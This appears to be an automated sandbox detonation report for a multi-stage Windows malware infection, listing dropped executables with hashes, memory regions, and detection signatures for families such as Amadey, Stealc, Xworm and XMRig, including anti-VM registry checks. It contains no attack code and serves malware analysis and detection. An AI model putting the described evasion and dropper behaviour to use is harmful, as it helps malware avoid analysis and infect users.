| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe
| MD5 | 8538c195a09066478922511ea1a02edf |
| SHA1 | 15e8910df845d897b4bb163caef4c6112570855b |
| SHA256 | d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96 |
| SHA512 | 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c |
memory/2352-144-0x0000000006790000-0x0000000006C3B000-memory.dmp
memory/2352-147-0x0000000006790000-0x00000000073E1000-memory.dmp
memory/2352-148-0x0000000006790000-0x00000000073E1000-memory.dmp
memory/2552-149-0x0000000000A30000-0x0000000001681000-memory.dmp
memory/2352-151-0x00000000000A0000-0x000000000055F000-memory.dmp
memory/2552-152-0x0000000000A30000-0x0000000001681000-memory.dmp
memory/1828-155-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2552-154-0x0000000000A30000-0x0000000001681000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\Tar8EB0.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
memory/2384-230-0x0000000000170000-0x000000000061B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe
| MD5 | 2a48e7b047c5ff096c6dce52d4f26dbb |
| SHA1 | e0d61e10b27131b1c34ade44d1a2117afd2cf099 |
| SHA256 | 42642893c6a6af226aab5b2cce0875e7affebf7d1001146ddd90234d4c01492d |
| SHA512 | 75965d3aa7cda41ecc11f87b1ac2b12283d58650f5b96f2af560aff859ca74c0c0cb26dfc765b4d8318291d8f89fdbb338fb71ddf3f4b63389aedb5e2106165a |
memory/2352-248-0x0000000006790000-0x0000000006C3B000-memory.dmp
memory/2648-254-0x00000000012B0000-0x00000000015C4000-memory.dmp
memory/2352-257-0x00000000000A0000-0x000000000055F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe
| MD5 | 338a31056b3b81d48a292a7bf9af67c7 |
| SHA1 | f5061e3583ba604b25e316f12fc58f40238d44b4 |
| SHA256 | cd1c085a07dc81e4305c2b9ee57e5c0433858c97cb20b1743cf44931c431ccea |
| SHA512 | 5bc7823cbd1ab6fa963df8f152d8b6de56af41159f3a736d147f1e5b4dcba3007319e2d2fb13e97f1e8b3cce3ab0d17e31d541be1ab53f8bd05a42316a940abc |
memory/1676-276-0x0000000001330000-0x00000000019B7000-memory.dmp
\Users\Admin\AppData\Local\Temp\NBJ5wfAV8NCe\Y-Cleaner.exe
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe
| MD5 | c0caf5a901b162b6792eab9697827b5d |
| SHA1 | d078ba4ad104c40bf5f2c8afda1cbdf4afc55a84 |
| SHA256 | 28c182baea1726c3e851405b13f130e02817099758abab86ca9cdc3607b9f89f |
| SHA512 | 3fba4eb7a2bc21fc24a6e29495e598efc5f208db030b13de8af43a392a93e3a920e4e8e4b68e10d4dc4a0e8779401ca738172ca9cba2ddc2246854c41a8a58a5 |
memory/2352-299-0x00000000000A0000-0x000000000055F000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\a235d1f1-3c99-4844-9c4d-ef664963c167
| MD5 | 3b911f40561733efbb7ef1f8b0061797 |
| SHA1 | e989039184feb69005e0d0cbffe050c6cba4baaf |
| SHA256 | 8e8babdfc7de4c3fd983f4a5cfb1a87638eaff965de8471dea78adfce0208ee3 |
| SHA512 | e9954c282831a29676acbb091c1ccb5badeba1c98a727d6c57e267e3e4948ce309189ef5edf9196b9ae1cf5e0f6d75e45ea6d69f1c9db518b348f616137e0a7f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 6cb779084a4a54c5dfae4f07b5ed7d02 |
| SHA1 | 8d8e7d52a023403943054af1fabd139bbdfbbc57 |
| SHA256 | 861578c8f0fbbcfd69a1b342bc26c0f5289ce7b050c9830123f222da7875c101 |
| SHA512 | ec3b83b8678c529eb8c44afe3c24be87068d98a3e07c62ffa0f9f625c4cbf6f725100d793a7d33f745c718bc849b760ec11ebfca92dc80ae41078591f342cf35 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\83d89f60-d287-48c7-bf80-0c36061ff33d
| MD5 | 711bdc4b9effd3ac9f20f20b49aff77d |
| SHA1 | b8bdf43293526c6ca5c061afafb8879f489a8108 |
| SHA256 | 46242560590ee1c7099c56cfe3512807686ad578365e43e8f750b4a3acdc8101 |
| SHA512 | f7400df4cd75a251e8fd88185a6c002c5c0af36b80a3cbb16ebbafff7586829fc9ad8e1dabd3f0105e0f8c31c3f8678921079c5100d90e2fa79a5468796730cd |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 29840b80836cf007cb87c5155f230588 |
| SHA1 | 00a0dcc50281e0fcbf6cfbc06647a19e3afc565c |
| SHA256 | 9967b9a45f6f608bdc8c673518b4df82c01d0c5bd9dc77ccabdaef0ff3fe90f1 |
| SHA512 | 6e0ded07a22baa41269d93e053e6406ac7bc525c04f1f510b4c64e18bf321181dfa49fb525bde210b5d1742ee94ef350a16dbe04458fdcaad5a17649b2a08617 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe
| MD5 | 8043b20e32ff2f0c75e9a3eed0c4bf07 |
| SHA1 | 5464aa1bc2a91c64cd8c4cbbb6970e8189c158a3 |
| SHA256 | 69a487512dfb97f08d068d0f9dd3924f42bef46bddd79112cb206b00fc16713e |
| SHA512 | 35639c6aad3dd25f606ca72ad108f774b083fa62677772242d357d59add9bba1dc85532d58ae67277d90c04dd4a5189548ca331fe93ee086c31cacbf11b8a18c |
memory/2972-453-0x00000000002E0000-0x0000000000738000-memory.dmp
memory/2972-454-0x00000000002E0000-0x0000000000738000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe
| MD5 | 47177b7fbf1ce282fb87da80fd264b3f |
| SHA1 | d07d2f9624404fa882eb94ee108f222d76bbbd4c |
| SHA256 | e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb |
| SHA512 | 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9 |
memory/3160-473-0x0000000000390000-0x00000000003A0000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\Desktop\YCL.lnk
| MD5 | cd2bdaf463be216b1a3cfae3774a6041 |
| SHA1 | 8a30d9d8e9318feece57eb26dda7defbc5722568 |
| SHA256 | 1afc2faf495971b14118266518ef19402173260677a40e837f01e5dd88d01e9e |
| SHA512 | 7298832a143715727c59330cf588884d53bf83e62a1f995fa6ba2d550b76996e3ce291f3a6e01e97b30cdd0bd7f3c7d6562c47d9c99bcbb3b6f6c52fd104def1 |
memory/2352-486-0x00000000000A0000-0x000000000055F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe
| MD5 | 73636685f823d103c54b30bc457c7f0d |
| SHA1 | 597dba03dce00cf6d30b082c80c8f9108ae90ccf |
| SHA256 | 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c |
| SHA512 | 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | b9fc62c23c5d1e08e35944e848c27c49 |
| SHA1 | 9063ff1d82ffa3a74f85100d579ddfb794fb49bd |
| SHA256 | 2e19f17ad09d2c178fda6ab4612fa62c19a2c7cd9509e179c6236552908b60ea |
| SHA512 | 8645116b34bc2cc0a848c0edc0892eb8287e721df37914cb803dbd6b9eebab8cf2972f2b4d2066ee674866b7f7dca19e79026735186b363d25056f853bf5a1ef |
memory/2352-530-0x00000000000A0000-0x000000000055F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe
| MD5 | dab2bc3868e73dd0aab2a5b4853d9583 |
| SHA1 | 3dadfc676570fc26fc2406d948f7a6d4834a6e2c |
| SHA256 | 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb |
| SHA512 | 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8 |
memory/2352-543-0x00000000000A0000-0x000000000055F000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js
| MD5 | 9dc7f05134ea58b5e327e653607f35a1 |
| SHA1 | fd7cf07194cbc4c11702da74244775295669bede |
| SHA256 | d0cc6fce653a2c1351e50c1730aaa61d132a6562de3efa382a94ec1dc0c0502b |
| SHA512 | 40eb82a56188d0caafd57ccbe891c19b3085ea5c33a8a4045d56570279a007a164a22ac195d3bdebc7c66ed70bba7bb8fda320926d318dc71210dbf11421d17d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js
| MD5 | 25593dad9a83536ef6becca2312ba023 |
| SHA1 | 15a05338ad035f96d9f0b6b9d356e5ddbcbd8537 |
| SHA256 | a8518ebaee54f62745047f953c5d118b875bbdc72ebe10d3bc6c91eec0a35e57 |
| SHA512 | 5b74e3d0036384872af7309c136150230d86aaf1a65c8a9193ba3e2f8ffbc01fd6f9bf1d63dbfee74c038c9b51b76bfd74f01a90f520a2b0a8c872126d90dba9 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 85430baed3398695717b0263807cf97c |
| SHA1 | fffbee923cea216f50fce5d54219a188a5100f41 |
| SHA256 | a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e |
| SHA512 | 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
| MD5 | fe3355639648c417e8307c6d051e3e37 |
| SHA1 | f54602d4b4778da21bc97c7238fc66aa68c8ee34 |
| SHA256 | 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e |
| SHA512 | 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
| MD5 | 3d33cdc0b3d281e67dd52e14435dd04f |
| SHA1 | 4db88689282fd4f9e9e6ab95fcbb23df6e6485db |
| SHA256 | f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b |
| SHA512 | a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js
| MD5 | fc50585b0063e57b067bc2eccfdc7b1c |
| SHA1 | 37a3062d353214d44ecb9f1cdb6018395c929d25 |
| SHA256 | 0fdc23e93b8ca26bc3b3ea26d882dde25f8ca2a9efae3b33b75ff16b9e5abc3e |
| SHA512 | 5680fdf83b422c9874b7900a6e24164f579456b2bd52d7e6ddd6d26dcbd51c9490393ae54904d6d25302e41a0095da61ab905a2f094e0158b1cddc8eb4182bde |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
| MD5 | 8be33af717bb1b67fbd61c3f4b807e9e |
| SHA1 | 7cf17656d174d951957ff36810e874a134dd49e0 |
| SHA256 | e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd |
| SHA512 | 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
| MD5 | 49ddb419d96dceb9069018535fb2e2fc |
| SHA1 | 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6 |
| SHA256 | 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539 |
| SHA512 | 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | a01c5ecd6108350ae23d2cddf0e77c17 |
| SHA1 | c6ac28a2cd979f1f9a75d56271821d5ff665e2b6 |
| SHA256 | 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42 |
| SHA512 | b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
| MD5 | 33bf7b0439480effb9fb212efce87b13 |
| SHA1 | cee50f2745edc6dc291887b6075ca64d716f495a |
| SHA256 | 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e |
| SHA512 | d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
| MD5 | 688bed3676d2104e7f17ae1cd2c59404 |
| SHA1 | 952b2cdf783ac72fcb98338723e9afd38d47ad8e |
| SHA256 | 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237 |
| SHA512 | 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
| MD5 | 937326fead5fd401f6cca9118bd9ade9 |
| SHA1 | 4526a57d4ae14ed29b37632c72aef3c408189d91 |
| SHA256 | 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81 |
| SHA512 | b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2 |
C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe
| MD5 | f155a51c9042254e5e3d7734cd1c3ab0 |
| SHA1 | 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf |
| SHA256 | 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af |
| SHA512 | 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a |
memory/2352-650-0x00000000000A0000-0x000000000055F000-memory.dmp
C:\ProgramData\50E370761CD6C8DF.dat
| MD5 | 02d2c46697e3714e49f46b680b9a6b83 |
| SHA1 | 84f98b56d49f01e9b6b76a4e21accf64fd319140 |
| SHA256 | 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9 |
| SHA512 | 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac |
memory/2460-678-0x0000000000CB0000-0x0000000001151000-memory.dmp
memory/2352-679-0x00000000000A0000-0x000000000055F000-memory.dmp
memory/2352-684-0x00000000000A0000-0x000000000055F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe
| MD5 | 9da08b49cdcc4a84b4a722d1006c2af8 |
| SHA1 | 7b5af0630b89bd2a19ae32aea30343330ca3a9eb |
| SHA256 | 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd |
| SHA512 | 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb |
memory/4044-762-0x000000013F990000-0x0000000140FDB000-memory.dmp
memory/3644-823-0x000000013F120000-0x000000013FCC1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe
| MD5 | b60779fb424958088a559fdfd6f535c2 |
| SHA1 | bcea427b20d2f55c6372772668c1d6818c7328c9 |
| SHA256 | 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221 |
| SHA512 | c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f |
memory/3448-836-0x0000000001100000-0x0000000001160000-memory.dmp
memory/3548-856-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3548-854-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/3548-852-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3548-850-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3548-848-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3548-846-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3548-844-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3548-842-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3548-840-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3548-838-0x0000000000400000-0x0000000000429000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe
| MD5 | d39df45e0030e02f7e5035386244a523 |
| SHA1 | 9ae72545a0b6004cdab34f56031dc1c8aa146cc9 |
| SHA256 | df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2 |
| SHA512 | 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64 |
memory/3864-867-0x0000000001220000-0x0000000001232000-memory.dmp
memory/3864-868-0x00000000004D0000-0x00000000004E0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe
| MD5 | 641525fe17d5e9d483988eff400ad129 |
| SHA1 | 8104fa08cfcc9066df3d16bfa1ebe119668c9097 |
| SHA256 | 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a |
| SHA512 | ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e |
memory/3672-881-0x00000000012D0000-0x0000000001340000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108030101\v6Oqdnc.exe
| MD5 | d0a56cd33f4917ccce9660312f2e2f45 |
| SHA1 | c0948cb562f3a62b430789a5520475a624675680 |
| SHA256 | d7bd83b880b413926f9487c9b6e295fd5cdd71b88e2988998d29016a5377e9bb |
| SHA512 | c835272405aed024d683f6e883672a37bdba2ba04b9063afbf2e1eae10980f952ff7171e123b3eda1fcc11f1b0336df03d717a29c8c168ab848d03fb712d1836 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-05 23:34
Reported
2025-03-05 23:37
Platform
win10v2004-20250217-en
Max time kernel
119s
Max time network
152s
Command Line
Signatures
Amadey
Amadey family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
LiteHTTP
Litehttp family
Stealc
Stealc family
SystemBC
Systembc family
Xmrig family
Xworm
Xworm family
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\gmwu\wtrpqgw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\gmwu\wtrpqgw.exe | N/A |
